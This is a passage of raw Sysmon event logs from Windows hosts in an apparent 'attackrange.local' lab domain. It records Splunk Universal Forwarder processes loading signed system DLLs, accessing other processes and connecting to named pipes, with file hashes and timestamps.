Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219761Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.721{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5EF989A6F3D98EEA7765C1F21A0988,SHA256=75F584CD843177424ACE6BCA28C9FF0541EA7520AE57FB20D2C998A92DDB0703,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219760Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.721{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B81-618E-12CE-08000000F101}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057346123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.940{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.940{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B86A2851E017E0EE53D83C823818EF3E,SHA256=A428D29D0914F49BD2E43297BEF0FE1864873B5F539238EFCEBF62C0CD404D17falsetrue 734700x800000000000000057346121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057346117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057346116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057346115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057346111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057346110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057346105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057346102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057346100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057346097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057346095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057346094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057346093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057346091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.909{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057346088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057346086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057346085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057346084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x800000000000000057346078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.893{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057346076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.888{8B6011A9-5B81-618E-49F3-04000000F101}8580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 